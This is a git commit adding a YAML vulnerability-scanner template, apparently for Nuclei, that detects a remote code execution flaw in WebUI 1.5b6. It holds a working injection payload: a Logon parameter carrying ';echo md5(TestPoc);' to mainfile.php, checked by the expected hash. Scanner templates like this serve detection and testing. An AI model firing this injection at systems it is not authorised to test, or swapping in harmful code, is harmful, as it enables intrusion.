Merge pull request #896 from pikpikcu/patch-73

Create webui-rce
patch-1
PD-Team 2021-02-19 13:53:00 +05:30 committed by GitHub
commit b72c81b963
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: webui-rce
info:
name: WebUI 1.5b6 RCE
author: pikpikcu
severity: critical
reference: https://www.exploit-db.com/exploits/36821
tags: webui,rce
requests:
- method: GET
path:
- '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'
matchers-condition: and
matchers:
- type: word
words:
- "c5b3d7397a90f42d222f7ed9408c0dc6"
part: body
- type: status
status:
- 200